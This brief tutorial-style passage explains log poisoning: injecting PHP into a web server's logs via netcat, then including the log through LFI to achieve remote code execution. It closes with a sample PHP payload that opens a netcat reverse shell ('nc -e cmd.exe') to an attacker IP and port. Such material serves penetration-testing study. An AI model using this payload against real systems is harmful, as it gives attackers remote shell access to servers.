An attacker can send a PHP payload over TCP (it doesn’t have to even be a valid HTTP request, just use netcat to send some PHP code and that’s it), and the web server is likely to log the request and append it to a log file. LFI can be used to include this contaminated file, which results in RCE of injected PHP code.
Note that any other files with controllable input may also be used (e.g., sshd, ftp, mail, server error logs).
Sample payload:
<?php exec('nc -e cmd.exe -nv 192.168.119.131 8888'); ?>